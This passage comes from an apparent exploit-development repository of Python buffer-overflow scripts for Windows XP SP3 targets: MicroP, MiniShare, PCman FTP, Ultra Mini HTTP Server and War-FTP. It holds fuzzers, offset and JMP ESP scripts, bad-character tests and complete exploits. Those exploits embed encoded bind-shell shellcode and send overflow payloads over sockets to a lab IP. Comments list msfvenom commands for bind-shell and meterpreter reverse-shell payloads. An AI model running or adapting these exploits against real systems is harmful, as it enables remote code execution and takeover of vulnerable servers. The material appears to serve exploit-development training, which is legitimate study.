buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | 
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | file.write(buffer) 17 | 18 | file.close() 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_shellcode_attempt1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_shellcode_attempt1.mppl", "wb") 4 | 5 | shellcode = ("\xb8\x91\x29\xbd\xbb\xdb\xcd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" 6 | "\x53\x31\x47\x12\x83\xc7\x04\x03\xd6\x27\x5f\x4e\x24\xdf\x1d" 7 | "\xb1\xd4\x20\x42\x3b\x31\x11\x42\x5f\x32\x02\x72\x2b\x16\xaf" 8 | "\xf9\x79\x82\x24\x8f\x55\xa5\x8d\x3a\x80\x88\x0e\x16\xf0\x8b" 9 | "\x8c\x65\x25\x6b\xac\xa5\x38\x6a\xe9\xd8\xb1\x3e\xa2\x97\x64" 10 | "\xae\xc7\xe2\xb4\x45\x9b\xe3\xbc\xba\x6c\x05\xec\x6d\xe6\x5c" 11 | "\x2e\x8c\x2b\xd5\x67\x96\x28\xd0\x3e\x2d\x9a\xae\xc0\xe7\xd2" 12 | "\x4f\x6e\xc6\xda\xbd\x6e\x0f\xdc\x5d\x05\x79\x1e\xe3\x1e\xbe" 13 | "\x5c\x3f\xaa\x24\xc6\xb4\x0c\x80\xf6\x19\xca\x43\xf4\xd6\x98" 14 | "\x0b\x19\xe8\x4d\x20\x25\x61\x70\xe6\xaf\x31\x57\x22\xeb\xe2" 15 | "\xf6\x73\x51\x44\x06\x63\x3a\x39\xa2\xe8\xd7\x2e\xdf\xb3\xbf" 16 | 
"\x83\xd2\x4b\x40\x8c\x65\x38\x72\x13\xde\xd6\x3e\xdc\xf8\x21" 17 | "\x40\xf7\xbd\xbd\xbf\xf8\xbd\x94\x7b\xac\xed\x8e\xaa\xcd\x65" 18 | "\x4e\x52\x18\x13\x46\xf5\xf3\x06\xab\x45\xa4\x86\x03\x2e\xae" 19 | "\x08\x7c\x4e\xd1\xc2\x15\xe7\x2c\xed\x08\xa4\xb9\x0b\x40\x44" 20 | "\xec\x84\xfc\xa6\xcb\x1c\x9b\xd9\x39\x35\x0b\x91\x2b\x82\x34" 21 | "\x22\x7e\xa4\xa2\xa9\x6d\x70\xd3\xad\xbb\xd0\x84\x3a\x31\xb1" 22 | "\xe7\xdb\x46\x98\x9f\x78\xd4\x47\x5f\xf6\xc5\xdf\x08\x5f\x3b" 23 | "\x16\xdc\x4d\x62\x80\xc2\x8f\xf2\xeb\x46\x54\xc7\xf2\x47\x19" 24 | "\x73\xd1\x57\xe7\x7c\x5d\x03\xb7\x2a\x0b\xfd\x71\x85\xfd\x57" 25 | "\x28\x7a\x54\x3f\xad\xb0\x67\x39\xb2\x9c\x11\xa5\x03\x49\x64" 26 | "\xda\xac\x1d\x60\xa3\xd0\xbd\x8f\x7e\x51\xcd\xc5\x22\xf0\x46" 27 | "\x80\xb7\x40\x0b\x33\x62\x86\x32\xb0\x86\x77\xc1\xa8\xe3\x72" 28 | "\x8d\x6e\x18\x0f\x9e\x1a\x1e\xbc\x9f\x0e") 29 | 30 | buffer= "A"*1276 31 | buffer+= "\xd7\x30\x9d\x7c" 32 | buffer+= "\x90"*100 33 | buffer+= shellcode 34 | buffer+= "C"*2000 35 | 36 | file.write(buffer) 37 | 38 | file.close() 39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_shellcode_attempt2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_shellcode_attempt2.mppl", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 6 | 7 | shellcode = ("\xb8\x91\x29\xbd\xbb\xdb\xcd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" 8 | "\x53\x31\x47\x12\x83\xc7\x04\x03\xd6\x27\x5f\x4e\x24\xdf\x1d" 9 | "\xb1\xd4\x20\x42\x3b\x31\x11\x42\x5f\x32\x02\x72\x2b\x16\xaf" 10 | "\xf9\x79\x82\x24\x8f\x55\xa5\x8d\x3a\x80\x88\x0e\x16\xf0\x8b" 11 | "\x8c\x65\x25\x6b\xac\xa5\x38\x6a\xe9\xd8\xb1\x3e\xa2\x97\x64" 12 | "\xae\xc7\xe2\xb4\x45\x9b\xe3\xbc\xba\x6c\x05\xec\x6d\xe6\x5c" 13 | 
"\x2e\x8c\x2b\xd5\x67\x96\x28\xd0\x3e\x2d\x9a\xae\xc0\xe7\xd2" 14 | "\x4f\x6e\xc6\xda\xbd\x6e\x0f\xdc\x5d\x05\x79\x1e\xe3\x1e\xbe" 15 | "\x5c\x3f\xaa\x24\xc6\xb4\x0c\x80\xf6\x19\xca\x43\xf4\xd6\x98" 16 | "\x0b\x19\xe8\x4d\x20\x25\x61\x70\xe6\xaf\x31\x57\x22\xeb\xe2" 17 | "\xf6\x73\x51\x44\x06\x63\x3a\x39\xa2\xe8\xd7\x2e\xdf\xb3\xbf" 18 | "\x83\xd2\x4b\x40\x8c\x65\x38\x72\x13\xde\xd6\x3e\xdc\xf8\x21" 19 | "\x40\xf7\xbd\xbd\xbf\xf8\xbd\x94\x7b\xac\xed\x8e\xaa\xcd\x65" 20 | "\x4e\x52\x18\x13\x46\xf5\xf3\x06\xab\x45\xa4\x86\x03\x2e\xae" 21 | "\x08\x7c\x4e\xd1\xc2\x15\xe7\x2c\xed\x08\xa4\xb9\x0b\x40\x44" 22 | "\xec\x84\xfc\xa6\xcb\x1c\x9b\xd9\x39\x35\x0b\x91\x2b\x82\x34" 23 | "\x22\x7e\xa4\xa2\xa9\x6d\x70\xd3\xad\xbb\xd0\x84\x3a\x31\xb1" 24 | "\xe7\xdb\x46\x98\x9f\x78\xd4\x47\x5f\xf6\xc5\xdf\x08\x5f\x3b" 25 | "\x16\xdc\x4d\x62\x80\xc2\x8f\xf2\xeb\x46\x54\xc7\xf2\x47\x19" 26 | "\x73\xd1\x57\xe7\x7c\x5d\x03\xb7\x2a\x0b\xfd\x71\x85\xfd\x57" 27 | "\x28\x7a\x54\x3f\xad\xb0\x67\x39\xb2\x9c\x11\xa5\x03\x49\x64" 28 | "\xda\xac\x1d\x60\xa3\xd0\xbd\x8f\x7e\x51\xcd\xc5\x22\xf0\x46" 29 | "\x80\xb7\x40\x0b\x33\x62\x86\x32\xb0\x86\x77\xc1\xa8\xe3\x72" 30 | "\x8d\x6e\x18\x0f\x9e\x1a\x1e\xbc\x9f\x0e") 31 | 32 | buffer= "A"*1276 33 | buffer+= "\x66\xe8\x41\x7e" 34 | buffer+= "\x90"*100 35 | buffer+= shellcode 36 | buffer+= "C"*2000 37 | 38 | file.write(buffer) 39 | 40 | file.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_shellcode_attempt3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_shellcode_attempt3.mppl", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 6 | 7 | shellcode = ("\xb8\x91\x29\xbd\xbb\xdb\xcd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" 8 | 
"\x53\x31\x47\x12\x83\xc7\x04\x03\xd6\x27\x5f\x4e\x24\xdf\x1d" 9 | "\xb1\xd4\x20\x42\x3b\x31\x11\x42\x5f\x32\x02\x72\x2b\x16\xaf" 10 | "\xf9\x79\x82\x24\x8f\x55\xa5\x8d\x3a\x80\x88\x0e\x16\xf0\x8b" 11 | "\x8c\x65\x25\x6b\xac\xa5\x38\x6a\xe9\xd8\xb1\x3e\xa2\x97\x64" 12 | "\xae\xc7\xe2\xb4\x45\x9b\xe3\xbc\xba\x6c\x05\xec\x6d\xe6\x5c" 13 | "\x2e\x8c\x2b\xd5\x67\x96\x28\xd0\x3e\x2d\x9a\xae\xc0\xe7\xd2" 14 | "\x4f\x6e\xc6\xda\xbd\x6e\x0f\xdc\x5d\x05\x79\x1e\xe3\x1e\xbe" 15 | "\x5c\x3f\xaa\x24\xc6\xb4\x0c\x80\xf6\x19\xca\x43\xf4\xd6\x98" 16 | "\x0b\x19\xe8\x4d\x20\x25\x61\x70\xe6\xaf\x31\x57\x22\xeb\xe2" 17 | "\xf6\x73\x51\x44\x06\x63\x3a\x39\xa2\xe8\xd7\x2e\xdf\xb3\xbf" 18 | "\x83\xd2\x4b\x40\x8c\x65\x38\x72\x13\xde\xd6\x3e\xdc\xf8\x21" 19 | "\x40\xf7\xbd\xbd\xbf\xf8\xbd\x94\x7b\xac\xed\x8e\xaa\xcd\x65" 20 | "\x4e\x52\x18\x13\x46\xf5\xf3\x06\xab\x45\xa4\x86\x03\x2e\xae" 21 | "\x08\x7c\x4e\xd1\xc2\x15\xe7\x2c\xed\x08\xa4\xb9\x0b\x40\x44" 22 | "\xec\x84\xfc\xa6\xcb\x1c\x9b\xd9\x39\x35\x0b\x91\x2b\x82\x34" 23 | "\x22\x7e\xa4\xa2\xa9\x6d\x70\xd3\xad\xbb\xd0\x84\x3a\x31\xb1" 24 | "\xe7\xdb\x46\x98\x9f\x78\xd4\x47\x5f\xf6\xc5\xdf\x08\x5f\x3b" 25 | "\x16\xdc\x4d\x62\x80\xc2\x8f\xf2\xeb\x46\x54\xc7\xf2\x47\x19" 26 | "\x73\xd1\x57\xe7\x7c\x5d\x03\xb7\x2a\x0b\xfd\x71\x85\xfd\x57" 27 | "\x28\x7a\x54\x3f\xad\xb0\x67\x39\xb2\x9c\x11\xa5\x03\x49\x64" 28 | "\xda\xac\x1d\x60\xa3\xd0\xbd\x8f\x7e\x51\xcd\xc5\x22\xf0\x46" 29 | "\x80\xb7\x40\x0b\x33\x62\x86\x32\xb0\x86\x77\xc1\xa8\xe3\x72" 30 | "\x8d\x6e\x18\x0f\x9e\x1a\x1e\xbc\x9f\x0e") 31 | 32 | buffer= "A"*1276 33 | buffer+= "\x66\xe8\x41\x7e" 34 | buffer+= "\x90"*100 35 | buffer+= shellcode 36 | buffer+= "C"*2000 37 | 38 | file.write(buffer) 39 | 40 | file.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_shellcode_attempt4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 
3 | file = open("exploit_shellcode_attempt4.mppl", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 6 | 7 | shellcode = ("\xb8\x91\x29\xbd\xbb\xdb\xcd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" 8 | "\x53\x31\x47\x12\x83\xc7\x04\x03\xd6\x27\x5f\x4e\x24\xdf\x1d" 9 | "\xb1\xd4\x20\x42\x3b\x31\x11\x42\x5f\x32\x02\x72\x2b\x16\xaf" 10 | "\xf9\x79\x82\x24\x8f\x55\xa5\x8d\x3a\x80\x88\x0e\x16\xf0\x8b" 11 | "\x8c\x65\x25\x6b\xac\xa5\x38\x6a\xe9\xd8\xb1\x3e\xa2\x97\x64" 12 | "\xae\xc7\xe2\xb4\x45\x9b\xe3\xbc\xba\x6c\x05\xec\x6d\xe6\x5c" 13 | "\x2e\x8c\x2b\xd5\x67\x96\x28\xd0\x3e\x2d\x9a\xae\xc0\xe7\xd2" 14 | "\x4f\x6e\xc6\xda\xbd\x6e\x0f\xdc\x5d\x05\x79\x1e\xe3\x1e\xbe" 15 | "\x5c\x3f\xaa\x24\xc6\xb4\x0c\x80\xf6\x19\xca\x43\xf4\xd6\x98" 16 | "\x0b\x19\xe8\x4d\x20\x25\x61\x70\xe6\xaf\x31\x57\x22\xeb\xe2" 17 | "\xf6\x73\x51\x44\x06\x63\x3a\x39\xa2\xe8\xd7\x2e\xdf\xb3\xbf" 18 | "\x83\xd2\x4b\x40\x8c\x65\x38\x72\x13\xde\xd6\x3e\xdc\xf8\x21" 19 | "\x40\xf7\xbd\xbd\xbf\xf8\xbd\x94\x7b\xac\xed\x8e\xaa\xcd\x65" 20 | "\x4e\x52\x18\x13\x46\xf5\xf3\x06\xab\x45\xa4\x86\x03\x2e\xae" 21 | "\x08\x7c\x4e\xd1\xc2\x15\xe7\x2c\xed\x08\xa4\xb9\x0b\x40\x44" 22 | "\xec\x84\xfc\xa6\xcb\x1c\x9b\xd9\x39\x35\x0b\x91\x2b\x82\x34" 23 | "\x22\x7e\xa4\xa2\xa9\x6d\x70\xd3\xad\xbb\xd0\x84\x3a\x31\xb1" 24 | "\xe7\xdb\x46\x98\x9f\x78\xd4\x47\x5f\xf6\xc5\xdf\x08\x5f\x3b" 25 | "\x16\xdc\x4d\x62\x80\xc2\x8f\xf2\xeb\x46\x54\xc7\xf2\x47\x19" 26 | "\x73\xd1\x57\xe7\x7c\x5d\x03\xb7\x2a\x0b\xfd\x71\x85\xfd\x57" 27 | "\x28\x7a\x54\x3f\xad\xb0\x67\x39\xb2\x9c\x11\xa5\x03\x49\x64" 28 | "\xda\xac\x1d\x60\xa3\xd0\xbd\x8f\x7e\x51\xcd\xc5\x22\xf0\x46" 29 | "\x80\xb7\x40\x0b\x33\x62\x86\x32\xb0\x86\x77\xc1\xa8\xe3\x72" 30 | "\x8d\x6e\x18\x0f\x9e\x1a\x1e\xbc\x9f\x0e") 31 | 32 | buffer= "\x90"*24 33 | buffer+= shellcode 34 | buffer+= "\x90"*(1276-len(buffer)) 35 | buffer+= "\x66\xe8\x41\x7e" 36 | 37 | file.write(buffer) 38 | 39 | 
file.close() 40 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Minishare_1.4.1_HTTP_Server/minishare_1.4.1_http_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | MiniShare 1.4.1 HTTP Exploit - Offset & JMP ESP 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 15 | #shellcode = () 16 | 17 | #EIP = 36684335 -> offset at 1787 18 | offset = 'A'*1787 + 'B'*4 19 | 20 | #JMP ESP = !mona jmp -r esp -> 0x7c9d30d7 or \xd7\x30\x9d\x7c 21 | #nowjump = '\xd7\x30\x9d\x7c' 22 | 23 | #bufferandshellcode 24 | sploit = offset + "C"*(2200-len(offset)) 25 | 26 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | print "\nDestroy them with lazers..." 28 | s.connect(('172.16.73.129',80)) 29 | s.send('GET ' + sploit + ' HTTP/1.1\r\n\r\n') 30 | s.close 31 | print "\nFire in the hole! Go pick up the pieces!" 32 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Minishare_1.4.1_HTTP_Server/minishare_1.4.1_http_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | MiniShare v1.4.1 HTTP Exploit Fuzzer 10 | 1. 
python minishare_1.4.1_http_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | 16 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 17 | #shellcode = () 18 | 19 | offset = "A" * 2220 20 | #nowjump 21 | #bufferandshellcode 22 | sploit = offset 23 | 24 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',80)) 27 | s.send('GET ' + sploit + ' HTTP/1.1\r\n\r\n') 28 | s.close 29 | print "\nFire in the hole! Go pick up the pieces!" 30 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/PCman_FTP_Server/pcman_ftp_server_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | pcman FTP Server Exploit - Offset & JMP ESP 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 15 | #shellcode = () 16 | 17 | #EIP = 43396f43 -> offset at 2007 18 | offset = 'A'*2007 19 | 20 | #JMP ESP = !mona jmp -r esp -> 0x77c35459 or \x59\x54\xc3\x77 21 | #nowjump = '\x59\x54\xc3\x77' 22 | nowjump = 'B'*4 23 | 24 | #bufferandshellcode 25 | sploit = offset + nowjump + 'C'*(2500-len(offset+nowjump)) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | print "\nDestroy them with lazers..." 
30 | s.connect(('172.16.73.129',21)) 31 | s.recv(1024) 32 | s.send('USER anonymous\r\n') 33 | s.recv(1024) 34 | s.send('PASS anonymous\r\n') 35 | s.recv(1024) 36 | s.send('PUT ' + sploit + '\r\n\n') 37 | s.recv(1024) 38 | s.send('QUIT\r\n') 39 | s.close 40 | print "\nFire in the hole! Go pick up the pieces!" 41 | except: 42 | print "ERROR! Shutting it dooooown.." 43 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/PCman_FTP_Server/pcman_ftp_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | pcman FTP Server Exploit Fuzzer 10 | 1. python pcman_ftp_server_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = ( 17 | 18 | offset = "A" *2500 19 | #nowjump 20 | #bufferandshellcode 21 | sploit = offset 22 | 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',21)) 27 | s.recv(1024) 28 | s.send('USER anonymous\r\n') 29 | s.recv(1024) 30 | s.send('PASS anonymous\r\n') 31 | s.recv(1024) 32 | s.send('PUT ' + sploit + '\r\n\n') 33 | s.recv(1024) 34 | s.send('QUIT\r\n') 35 | s.close 36 | print "\nFire in the hole! Go pick up the pieces!" 37 | except: 38 | print "ERROR! Shutting it dooooown.." 
39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ultramini_HTTP_Server/ultramini_http_server_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ultra Mini HTTP Server - Offset & JMP ESP 10 | 1. python ultramini_http_server_eip2.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | 18 | #EIP = 79473479 -> offset at 5413 19 | offset = 'A'*5413 20 | 21 | #JMP ESP = !mona jmp -r esp -> 0x7e429353 or \x53\x93\x42\x7e 22 | #nowjump = '\x53\x93\x42\x7e' 23 | nowjump = 'B'*4 24 | 25 | #bufferandshellcode 26 | sploit = offset + nowjump + "\x90"*(5500-len(offset+nowjump)) 27 | 28 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | print "\nDestroy them with lazers..." 30 | s.connect(('172.16.73.129',80)) 31 | s.send('GET ' + sploit + ' HTTP/1.1\r\n\r\n') 32 | s.close 33 | print "\nFire in the hole! Go pick up the pieces!" 34 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ultramini_HTTP_Server/ultramini_http_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ultra Mini HTTP Server HTTP Exploit Fuzzer 10 | 1. 
python ultramini_http_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | 16 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 17 | #shellcode = () 18 | 19 | offset = "A" * 5500 20 | #nowjump 21 | #bufferandshellcode 22 | sploit = offset 23 | 24 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',80)) 27 | s.send('GET ' + sploit + ' HTTP/1.1\r\n\r\n') 28 | s.close 29 | print "\nFire in the hole! Go pick up the pieces!" 30 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ultramini_HTTP_Server/umhttp3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import struct 5 | 6 | shellcode=("\xb8\x22\xed\x67\xaa\xdb\xc6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" 7 | "\x53\x83\xc3\x04\x31\x43\x0e\x03\x61\xe3\x85\x5f\x99\x13\xcb" 8 | "\xa0\x61\xe4\xac\x29\x84\xd5\xec\x4e\xcd\x46\xdd\x05\x83\x6a" 9 | "\x96\x48\x37\xf8\xda\x44\x38\x49\x50\xb3\x77\x4a\xc9\x87\x16" 10 | "\xc8\x10\xd4\xf8\xf1\xda\x29\xf9\x36\x06\xc3\xab\xef\x4c\x76" 11 | "\x5b\x9b\x19\x4b\xd0\xd7\x8c\xcb\x05\xaf\xaf\xfa\x98\xbb\xe9" 12 | "\xdc\x1b\x6f\x82\x54\x03\x6c\xaf\x2f\xb8\x46\x5b\xae\x68\x97" 13 | "\xa4\x1d\x55\x17\x57\x5f\x92\x90\x88\x2a\xea\xe2\x35\x2d\x29" 14 | "\x98\xe1\xb8\xa9\x3a\x61\x1a\x15\xba\xa6\xfd\xde\xb0\x03\x89" 15 | "\xb8\xd4\x92\x5e\xb3\xe1\x1f\x61\x13\x60\x5b\x46\xb7\x28\x3f" 16 | "\xe7\xee\x94\xee\x18\xf0\x76\x4e\xbd\x7b\x9a\x9b\xcc\x26\xf3" 17 | "\x68\xfd\xd8\x03\xe7\x76\xab\x31\xa8\x2c\x23\x7a\x21\xeb\xb4" 18 | "\x7d\x18\x4b\x2a\x80\xa3\xac\x63\x47\xf7\xfc\x1b\x6e\x78\x97" 19 | "\xdb\x8f\xad\x02\xd3\x36\x1e\x31\x1e\x88\xce\xf5\xb0\x61\x05" 20 | "\xfa\xef\x92\x26\xd0\x98\x3b\xdb\xdb\xb7\xe7\x52\x3d\xdd\x07" 21 | 
"\x33\x95\x49\xea\x60\x2e\xee\x15\x43\x06\x98\x5e\x85\x91\xa7" 22 | "\x5e\x83\xb5\x3f\xd5\xc0\x01\x5e\xea\xcc\x21\x37\x7d\x9a\xa3" 23 | "\x7a\x1f\x9b\xe9\xec\xbc\x0e\x76\xec\xcb\x32\x21\xbb\x9c\x85" 24 | "\x38\x29\x31\xbf\x92\x4f\xc8\x59\xdc\xcb\x17\x9a\xe3\xd2\xda" 25 | "\xa6\xc7\xc4\x22\x26\x4c\xb0\xfa\x71\x1a\x6e\xbd\x2b\xec\xd8" 26 | "\x17\x87\xa6\x8c\xee\xeb\x78\xca\xee\x21\x0f\x32\x5e\x9c\x56" 27 | "\x4d\x6f\x48\x5f\x36\x8d\xe8\xa0\xed\x15\x18\xeb\xaf\x3c\xb1" 28 | "\xb2\x3a\x7d\xdc\x44\x91\x42\xd9\xc6\x13\x3b\x1e\xd6\x56\x3e" 29 | "\x5a\x50\x8b\x32\xf3\x35\xab\xe1\xf4\x1f") 30 | 31 | buffer = "\x90"*5412 32 | buffer += "\x53\x93\x42\x7e" 33 | buffer += "\x90"*192 34 | buffer += shellcode 35 | buffer += "\x90"*5158 36 | 37 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | s.connect(("172.16.73.129",80)) 39 | 40 | payload = ( 41 | "GET /" + buffer + " HTTP/1.1\r\n" + 42 | "Host: 172.16.73.129" + 43 | "\r\n\r\n") 44 | 45 | s.send(payload) 46 | s.close() 47 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/War-FTP_Server/war-ftpd-b-crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | War-FTP Server Exploit Fuzzer 10 | 1. python war-ftpd-b-crash.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | 18 | buffer = "A"*485 19 | buffer += "B"*4 20 | buffer += "C"*3000 21 | 22 | 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | print "\nDestroy them with lazers..." 
26 | s.connect(('172.16.73.129',21)) 27 | print s.recv(1024) 28 | s.send('USER ' + buffer + '\r\n') 29 | print s.recv(1024) 30 | s.send('PASS anonymous\r\n') 31 | print s.recv(1024) 32 | s.close() 33 | print "\nFire in the hole! Go pick up the pieces!" 34 | except: 35 | print "ERROR! Shutting it dooooown.." -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/War-FTP_Server/war-ftpd-badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | War-FTP Server Exploit Fuzzer 10 | 1. python war-ftpd-badchars.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | #\x00\x0a\x0d\x40 18 | 19 | buffer = "A"*485 20 | buffer += "B"*4 21 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 22 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" 23 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 24 | 